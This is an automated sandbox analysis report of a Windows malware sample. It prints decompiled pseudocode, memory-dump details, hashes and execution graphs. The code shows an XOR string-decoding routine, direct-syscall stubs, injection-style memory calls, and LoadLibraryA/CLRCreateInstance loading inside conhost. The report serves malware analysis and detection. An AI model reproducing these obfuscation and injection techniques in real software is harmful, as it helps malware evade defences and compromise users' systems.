				char _v680;
				void* _v1200;
				void* _v1208;
				char _v1468;
				long long _v1480;
				long long _v1496;
				long long _v1504;
				long long _v1512;
				long long _v1520;
				long long _v1528;
				long long _v1536;
				long long _v1544;
				long long _t97;
				long long _t107;

				_a8 = __rcx;
				_a16 = __rdx;
				L00401D70(); // executed
				memset(??, ??, ??);
				_v136 = 0x68;
				_v144 = 0;
				_v152 = 0x1da8d4;
				L00401D80();
				L00401D88();
				E00401000(0x402021,  &_v1468);
				_v1480 = 0x402021;
				E00401000(0x402027, 0x402021);
				L00401D90();
				E00401000(0x40203c,  &_v680);
				sprintf(??, ??);
				_v1504 =  &_v32;
				_v1512 =  &_v136;
				_v1520 = 0;
				_v1528 = 0;
				_v1536 = 0;
				_v1544 = 0;
				_t97 =  &_v680;
				L00401D98(); // executed
				_v1536 = _t97;
				_v1544 = _t97;
				E004019C6(_v32,  &_v144,  &_v152,  &_v152); // executed
				E00401000(0x402046, _v32); // executed
				_v1544 = 0;
				E00401986(_v32, _v144, 0x402046, 0x1da8d4); // executed
				_v1544 = 0;
				_t107 = _v32;
				E00401A06(_t107,  &_v144,  &_v152, 0); // executed
				_v1496 = _t107;
				_v1504 = 0;
				_v1512 = 0;
				_v1520 = 0;
				_v1528 = 0;
				_v1536 = 0;
				_v1544 = _v144;
				E00401946( &_v160, _v32, _v32, _v32); // executed
				return 0;
			}






















                                          0x004010cf
                                          0x004010d3
                                          0x004010e2
                                          0x00401109
                                          0x00401113
                                          0x00401120
                                          0x00401131
                                          0x00401145
                                          0x00401162
                                          0x0040117f
                                          0x00401196
                                          0x004011a3
                                          0x004011cf
                                          0x004011ec
                                          0x00401218
                                          0x00401221
                                          0x0040122a
                                          0x00401239
                                          0x00401248
                                          0x00401252
                                          0x0040125c
                                          0x00401285
                                          0x00401295
                                          0x0040129f
                                          0x004012a9
                                          0x004012d7
                                          0x004012f4
                                          0x00401303
                                          0x0040132f
                                          0x0040133e
                                          0x0040135f
                                          0x0040136c
                                          0x00401376
                                          0x00401385
                                          0x00401394
                                          0x004013a3
                                          0x004013ad
                                          0x004013bc
                                          0x004013c8
                                          0x004013f4
                                          0x004013ff

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID: memsetsprintf
                                          • String ID:
                                          • API String ID: 4041149307-0
                                          • Opcode ID: e611b780aaad0328af827d15d6967dd52fecb4441940ae0d59f41fbf170dceba
                                          • Instruction ID: d777382ce3b882984ebda8a8f82619b91bafcb5650684c5f5f4a19068a753fff
                                          • Opcode Fuzzy Hash: e611b780aaad0328af827d15d6967dd52fecb4441940ae0d59f41fbf170dceba
                                          • Instruction Fuzzy Hash: 53612C61702B504DEB508B27DC513DA76A8F749BC8F404176EE8CABB99EE3DCA44C784
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 27 401000-401045 call 401d68 30 401048-401050 27->30 31 4010b6-4010bb 30->31 32 401056-4010b4 30->32 32->30
                                          C-Code - Quality: 92%
                                          			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
				long long _v16;
				signed int _v20;
				void* _v32;
				signed char* _v40;
				signed int _t30;

				_a8 = __rcx;
				_a16 = __rdx;
				L00401D68(); // executed
				_v16 = _a16 + 1;
				 *((char*)(_v16 + _a16)) = 0;
				_v20 = 0;
				while(1) {
					_t30 = _v20;
					if(_t30 >= _a16) {
						break;
					}
					_v32 = _v16 + _v20;
					_v40 = _a8 + _v20;
					asm("cdq");
					 *_v32 =  *_v40 ^  *("jfudwgjnolydsljwixclrghiuanoznnv" + _v20 % 0x20);
					_v20 = _v20 + 1;
				}
				return _t30;
			}








                                          0x0040100b
                                          0x0040100f
                                          0x00401023
                                          0x00401028
                                          0x0040103e
                                          0x00401045
                                          0x00401048
                                          0x00401048
                                          0x00401050
                                          0x00000000
                                          0x00000000
                                          0x00401085
                                          0x0040108e
                                          0x00401092
                                          0x004010b2
                                          0x00401063
                                          0x00401063
                                          0x004010bb

                                          Strings
                                          • jfudwgjnolydsljwixclrghiuanoznnv, xrefs: 00401098
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jfudwgjnolydsljwixclrghiuanoznnv
                                          • API String ID: 0-2735995127
                                          • Opcode ID: 3395ddf03860ef85004415cfca38eec28906a0d9652ac0a9f3f7e601f17034a2
                                          • Instruction ID: e6fa5f20bfb036de9c56582362ae24f4d7d7e378f06df6b5650d7690213a9475
                                          • Opcode Fuzzy Hash: 3395ddf03860ef85004415cfca38eec28906a0d9652ac0a9f3f7e601f17034a2
                                          • Instruction Fuzzy Hash: D5214772B01A40DEEB04CBA9D8913AC3BF1EB4878DF00846AEE1DA7B58DA38D5518744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401BEA Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 53%
                                          			_entry_() {
				char _v12;
				long long _v24;
				long long _v40;
				void* _t15;
				void* _t16;

				L00401D78();
				L00401DA8();
				L00401DB0();
				L00401DB8();
				_v24 = __imp____argc;
				_v40 =  &_v12;
				L00401DC0();
				_v24 = __imp____argc;
				_t15 = E00401B3F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
				L00401DC8(); // executed
				return _t15;
			}








                                          0x00401c17
                                          0x00401c29
                                          0x00401c39
                                          0x00401c54
                                          0x00401c6e
                                          0x00401c76
                                          0x00401c97
                                          0x00401cb1
                                          0x00401cd0
                                          0x00401cdb
                                          0x00401ce1

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d8f7750eb13f6caf45962ae0b5c8e6f13678a6a96c502602ee71ae71581b22e
                                          • Instruction ID: edd8300733597f32f2ee978fe9ac9fff29ef75b1fe1343aac60f8b25cfeacb98
                                          • Opcode Fuzzy Hash: 7d8f7750eb13f6caf45962ae0b5c8e6f13678a6a96c502602ee71ae71581b22e
                                          • Instruction Fuzzy Hash: D2211964302E1488EB50DB27DC6179A67A4BB4DFC8F804937AE0DA73A5EE3CD601C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401B3F Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 50 401b3f-401bba call 401a48 call 4010c4 call 401adc
                                          C-Code - Quality: 43%
                                          			E00401B3F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v12;
				long long _v24;
				intOrPtr _t14;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				E00401A48(_a16, _a16, _a24);
				_v24 = __imp____argc;
				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
				_v12 = _t14;
				E00401ADC();
				return _v12;
			}






                                          0x00401b4a
                                          0x00401b4e
                                          0x00401b52
                                          0x00401b70
                                          0x00401b8a
                                          0x00401ba9
                                          0x00401bae
                                          0x00401bb1
                                          0x00401bba

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID: memsetsprintf
                                          • String ID:
                                          • API String ID: 4041149307-0
                                          • Opcode ID: 6764248a65143230f5fa14b63b02f471757a591320ddc2a527cf729df730e93a
                                          • Instruction ID: c571b51ad4df78ffad94752286725173bdee0121640128f8aec39e0708da8985
                                          • Opcode Fuzzy Hash: 6764248a65143230f5fa14b63b02f471757a591320ddc2a527cf729df730e93a
                                          • Instruction Fuzzy Hash: A601D266702B4889DB10DF66DC9139837A4B348BC8F004826AE0CA7B68DA38D511CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00401946 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E00401946(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E0040189D(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                          0x00401946
                                          0x0040194b
                                          0x00401950
                                          0x00401955
                                          0x00401963
                                          0x00401983
                                          0x00401985

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 754798f137a90f6bfbdd44437f8a26324e9b1650818ee4e69b83fa847c638778
                                          • Instruction ID: bb6dc57e5e6d00ac3b599d71d6b73205dd6ef6319e7c77c91fb469b109ff2e2c
                                          • Opcode Fuzzy Hash: 754798f137a90f6bfbdd44437f8a26324e9b1650818ee4e69b83fa847c638778
                                          • Instruction Fuzzy Hash: 55E0B676A08B80C18210EF55F04101AB7A4F7E87C4B14456EFAC817B19DF3CC1608E58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004019C6 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E004019C6(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E0040189D(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                          0x004019c6
                                          0x004019cb
                                          0x004019d0
                                          0x004019d5
                                          0x004019e3
                                          0x00401a03
                                          0x00401a05

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25404bc6cae4395c76a647428e86ba1968cc744108483a1f90b93c8c37301177
                                          • Instruction ID: 51c0650ffd9774f0920afbe4d4200ca525cd56899027ff788b3374880696bfbf
                                          • Opcode Fuzzy Hash: 25404bc6cae4395c76a647428e86ba1968cc744108483a1f90b93c8c37301177
                                          • Instruction Fuzzy Hash: 72E0B676608B80818210EF55F04001EB7A4F3E87C4F10465AFAC817B19CF38C1608E94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401A06 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E00401A06(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E0040189D(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                          0x00401a06
                                          0x00401a0b
                                          0x00401a10
                                          0x00401a15
                                          0x00401a23
                                          0x00401a43
                                          0x00401a45

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 998c96b42990e9022b0f6bd2447fd1769ed2e61415031125fd9c63c7b278971a
                                          • Instruction ID: 7424203293fca1d6e0b2c804dfbcc41db58a47c2ab58dfd9d4da75e1fe2057c2
                                          • Opcode Fuzzy Hash: 998c96b42990e9022b0f6bd2447fd1769ed2e61415031125fd9c63c7b278971a
                                          • Instruction Fuzzy Hash: C6E026B6A08B84928610EF56F04145AB7B4F7E87C4B54495AFAC857B19DF38C1608A54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401986 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E00401986(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E0040189D(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                          0x00401986
                                          0x0040198b
                                          0x00401990
                                          0x00401995
                                          0x004019a3
                                          0x004019c3
                                          0x004019c5

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.438450061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.438445677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.438454384.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439170445.00000000005DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.439175059.00000000005DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1338.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36b211a9e4b3872e90f16f796bb24afd1074b322115fdfb724c17c4b9b879d27
                                          • Instruction ID: 605c79eb5aeb9a106a83d6f2d40d4c4e89cbfcc3187a819f05b45420c746b8d7
                                          • Opcode Fuzzy Hash: 36b211a9e4b3872e90f16f796bb24afd1074b322115fdfb724c17c4b9b879d27
                                          • Instruction Fuzzy Hash: 7EE0B67A608B80C28210EF55F04001EBBA5F7E87C4B10495AFAC817B2ACF38C1608B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:11.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:42.9%
                                          Total number of Nodes:21
                                          Total number of Limit Nodes:2
                                          execution_graph 2231 2779de882af LoadLibraryA 2232 2779de882c7 2231->2232 2233 2779de89106 2234 2779de89128 2233->2234 2235 2779de89254 LoadLibraryA 2234->2235 2236 2779de89269 2234->2236 2242 2779de8917c 2234->2242 2235->2234 2236->2242 2244 2779de8931d 2236->2244 2252 2779de882a2 2236->2252 2238 2779de892f3 2239 2779de892f7 2238->2239 2245 2779de883ba LoadLibraryA 2238->2245 2239->2238 2239->2242 2243 2779de8930c 2243->2242 2243->2244 2244->2242 2247 2779de88eb2 2244->2247 2246 2779de883df 2245->2246 2246->2243 2248 2779de88ef2 CLRCreateInstance 2247->2248 2250 2779de88f0b 2247->2250 2248->2250 2249 2779de890b2 2249->2242 2250->2249 2250->2250 2251 2779de890a9 SafeArrayDestroy 2250->2251 2251->2249 2253 2779de882af LoadLibraryA 2252->2253 2254 2779de882c7 2253->2254 2254->2238

                                          Executed Functions

                                          Function 000002779DE89106 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 175 2779de89106-2779de89157 call 2779de8a2de * 3 182 2779de89189 175->182 183 2779de89159-2779de8915c 175->183 185 2779de8918c-2779de8919d 182->185 183->182 184 2779de8915e-2779de89161 183->184 184->182 186 2779de89163-2779de8917a 184->186 188 2779de8917c-2779de89183 186->188 189 2779de8919e-2779de891c9 call 2779de8a85e call 2779de8a87e 186->189 188->182 191 2779de89185 188->191 195 2779de89206-2779de8921d call 2779de8a2de 189->195 196 2779de891cb-2779de89200 call 2779de8a492 call 2779de8a352 189->196 191->182 195->182 202 2779de89223-2779de89224 195->202 196->195 205 2779de89462-2779de89473 196->205 204 2779de8922a-2779de89230 202->204 206 2779de89232 204->206 207 2779de89269-2779de89273 204->207 210 2779de89475-2779de8947f 205->210 211 2779de894a6-2779de894c7 call 2779de8a87e 205->211 212 2779de89234-2779de89236 206->212 208 2779de892a1-2779de892aa 207->208 209 2779de89275-2779de89290 call 2779de8a2de 207->209 217 2779de892c5-2779de892c8 208->217 218 2779de892ac-2779de892b6 call 2779de884d2 208->218 209->205 230 2779de89296-2779de8929f 209->230 210->211 219 2779de89481-2779de8949f call 2779de8a87e 210->219 238 2779de894c9 211->238 239 2779de894cd-2779de894cf 211->239 213 2779de89250-2779de89252 212->213 214 2779de89238-2779de8923e 212->214 213->207 221 2779de89254-2779de89267 LoadLibraryA 213->221 214->213 220 2779de89240-2779de8924e 214->220 217->205 225 2779de892ce-2779de892d8 217->225 218->205 235 2779de892bc-2779de892c3 218->235 219->211 220->212 220->213 221->204 227 2779de892e2-2779de892e9 225->227 228 2779de892da-2779de892db 225->228 232 2779de892eb-2779de892ec 227->232 233 2779de8931d-2779de89321 227->233 228->227 230->208 230->209 237 2779de892ee call 2779de882a2 232->237 240 2779de89327-2779de89349 233->240 241 2779de893fd-2779de89405 233->241 235->227 242 2779de892f3-2779de892f5 237->242 238->239 239->185 240->205 253 2779de8934f-2779de89369 call 2779de8a85e 240->253 243 2779de89457-2779de8945d call 2779de8990e 241->243 244 2779de89407-2779de8940d 241->244 245 2779de89304-2779de89307 call 2779de883ba 242->245 246 2779de892f7-2779de892fe 242->246 243->205 249 2779de8940f-2779de89415 244->249 250 2779de89424-2779de89436 call 2779de88eb2 244->250 257 2779de8930c-2779de8930e 245->257 246->205 246->245 249->205 254 2779de89417-2779de89422 call 2779de89d6a 249->254 261 2779de89448-2779de89455 call 2779de88952 250->261 262 2779de89438-2779de89443 call 2779de894d6 250->262 264 2779de89389-2779de893b2 253->264 265 2779de8936b-2779de8936e 253->265 254->205 257->233 263 2779de89310-2779de89317 257->263 261->205 262->261 263->205 263->233 264->205 273 2779de893b8-2779de893f8 264->273 265->241 268 2779de89374-2779de89387 call 2779de8a5e2 265->268 274 2779de893fa-2779de893fb 268->274 273->205 273->274 274->241
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction ID: 1cdbb2579aea5b7e8b2d53aadafa4764b1e38a7842d2e96e083102cac932efaa
                                          • Opcode Fuzzy Hash: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction Fuzzy Hash: 3BC1933071E949DBEB5DEE2ADCD97B9B3D1FB98300F540129D64EC7186DB20F8528A81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C34B1E Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 276 7ff9f1c34b1e-7ff9f1c34b87 279 7ff9f1c34b89-7ff9f1c34b92 276->279 280 7ff9f1c34bf3 276->280 279->280 281 7ff9f1c34b94-7ff9f1c34ba0 279->281 282 7ff9f1c34bf5-7ff9f1c34c1a 280->282 283 7ff9f1c34bd9-7ff9f1c34bf1 281->283 284 7ff9f1c34ba2-7ff9f1c34bb4 281->284 289 7ff9f1c34c1c-7ff9f1c34c25 282->289 290 7ff9f1c34c86 282->290 283->282 285 7ff9f1c34bb8-7ff9f1c34bcb 284->285 286 7ff9f1c34bb6 284->286 285->285 288 7ff9f1c34bcd-7ff9f1c34bd5 285->288 286->285 288->283 289->290 292 7ff9f1c34c27-7ff9f1c34c33 289->292 291 7ff9f1c34c88-7ff9f1c34d30 290->291 303 7ff9f1c34d9e 291->303 304 7ff9f1c34d32-7ff9f1c34d4b 291->304 293 7ff9f1c34c6c-7ff9f1c34c84 292->293 294 7ff9f1c34c35-7ff9f1c34c47 292->294 293->291 296 7ff9f1c34c4b-7ff9f1c34c5e 294->296 297 7ff9f1c34c49 294->297 296->296 299 7ff9f1c34c60-7ff9f1c34c68 296->299 297->296 299->293 305 7ff9f1c34da0-7ff9f1c34dc9 303->305 306 7ff9f1c34d4d-7ff9f1c34d5f 304->306 307 7ff9f1c34d84-7ff9f1c34d9c 304->307 312 7ff9f1c34dcb-7ff9f1c34dd6 305->312 313 7ff9f1c34e33 305->313 308 7ff9f1c34d63-7ff9f1c34d76 306->308 309 7ff9f1c34d61 306->309 307->305 308->308 311 7ff9f1c34d78-7ff9f1c34d80 308->311 309->308 311->307 312->313 314 7ff9f1c34dd8-7ff9f1c34de6 312->314 315 7ff9f1c34e35-7ff9f1c34ec8 313->315 316 7ff9f1c34e1f-7ff9f1c34e31 314->316 317 7ff9f1c34de8-7ff9f1c34dfa 314->317 323 7ff9f1c34ecc-7ff9f1c34edb 315->323 316->315 318 7ff9f1c34dfc 317->318 319 7ff9f1c34dfe-7ff9f1c34e11 317->319 318->319 319->319 321 7ff9f1c34e13-7ff9f1c34e1b 319->321 321->316 324 7ff9f1c34edd 323->324 325 7ff9f1c34ee3-7ff9f1c34f40 call 7ff9f1c34f64 323->325 324->325
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8e.S
                                          • API String ID: 0-2745307131
                                          • Opcode ID: baa4e3368779fe7f0a916182baa8f7e601ddb0e08892da5c06e7de3b98da16d2
                                          • Instruction ID: 4950fc3cf34cd23ed1ec086585f7c5c5a1deadc4156b88a4be95184d60ba035b
                                          • Opcode Fuzzy Hash: baa4e3368779fe7f0a916182baa8f7e601ddb0e08892da5c06e7de3b98da16d2
                                          • Instruction Fuzzy Hash: 05D18330918A4D8FEBA8DF28C8467F937D1FF64301F54426ED85DC7295DB74A9818B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C358CE Relevance: 1.6, Strings: 1, Instructions: 386COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 7ff9f1c358ce-7ff9f1c35937 335 7ff9f1c35939-7ff9f1c35942 332->335 336 7ff9f1c359a3 332->336 335->336 338 7ff9f1c35944-7ff9f1c35950 335->338 337 7ff9f1c359a5-7ff9f1c359ca 336->337 345 7ff9f1c359cc-7ff9f1c359d5 337->345 346 7ff9f1c35a36 337->346 339 7ff9f1c35989-7ff9f1c359a1 338->339 340 7ff9f1c35952-7ff9f1c35964 338->340 339->337 341 7ff9f1c35968-7ff9f1c3597b 340->341 342 7ff9f1c35966 340->342 341->341 344 7ff9f1c3597d-7ff9f1c35985 341->344 342->341 344->339 345->346 348 7ff9f1c359d7-7ff9f1c359e3 345->348 347 7ff9f1c35a38-7ff9f1c35a5d 346->347 354 7ff9f1c35acb 347->354 355 7ff9f1c35a5f-7ff9f1c35a78 347->355 349 7ff9f1c35a1c-7ff9f1c35a34 348->349 350 7ff9f1c359e5-7ff9f1c359f7 348->350 349->347 352 7ff9f1c359fb-7ff9f1c35a0e 350->352 353 7ff9f1c359f9 350->353 352->352 356 7ff9f1c35a10-7ff9f1c35a18 352->356 353->352 359 7ff9f1c35acd-7ff9f1c35afb 354->359 357 7ff9f1c35a7a-7ff9f1c35a8c 355->357 358 7ff9f1c35ab1-7ff9f1c35ac9 355->358 356->349 360 7ff9f1c35a90-7ff9f1c35aa3 357->360 361 7ff9f1c35a8e 357->361 358->359 364 7ff9f1c35b6b 359->364 365 7ff9f1c35afd-7ff9f1c35b08 359->365 360->360 362 7ff9f1c35aa5-7ff9f1c35aad 360->362 361->360 362->358 366 7ff9f1c35b6d-7ff9f1c35c47 364->366 365->364 367 7ff9f1c35b0a-7ff9f1c35b18 365->367 377 7ff9f1c35c4b-7ff9f1c35c5a 366->377 368 7ff9f1c35b1a-7ff9f1c35b2c 367->368 369 7ff9f1c35b51-7ff9f1c35b69 367->369 370 7ff9f1c35b30-7ff9f1c35b43 368->370 371 7ff9f1c35b2e 368->371 369->366 370->370 373 7ff9f1c35b45-7ff9f1c35b4d 370->373 371->370 373->369 378 7ff9f1c35c5c 377->378 379 7ff9f1c35c62-7ff9f1c35cbc call 7ff9f1c35ce0 377->379 378->379
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8e.S
                                          • API String ID: 0-2745307131
                                          • Opcode ID: a5ea20d36cde1d8697521c28d622a85dcaf4a91d177279fe75a0031972bbd5fb
                                          • Instruction ID: 285e110ec30dff752554d6255b3758f0bc606eaab4d7bf90c3244c61ccf8f8b2
                                          • Opcode Fuzzy Hash: a5ea20d36cde1d8697521c28d622a85dcaf4a91d177279fe75a0031972bbd5fb
                                          • Instruction Fuzzy Hash: 3ED18030918A4D8FEBA8DF28C8567F937D1FB54310F14826AD85DC7295CB74A9818B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE894D6 Relevance: .4, Instructions: 407COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
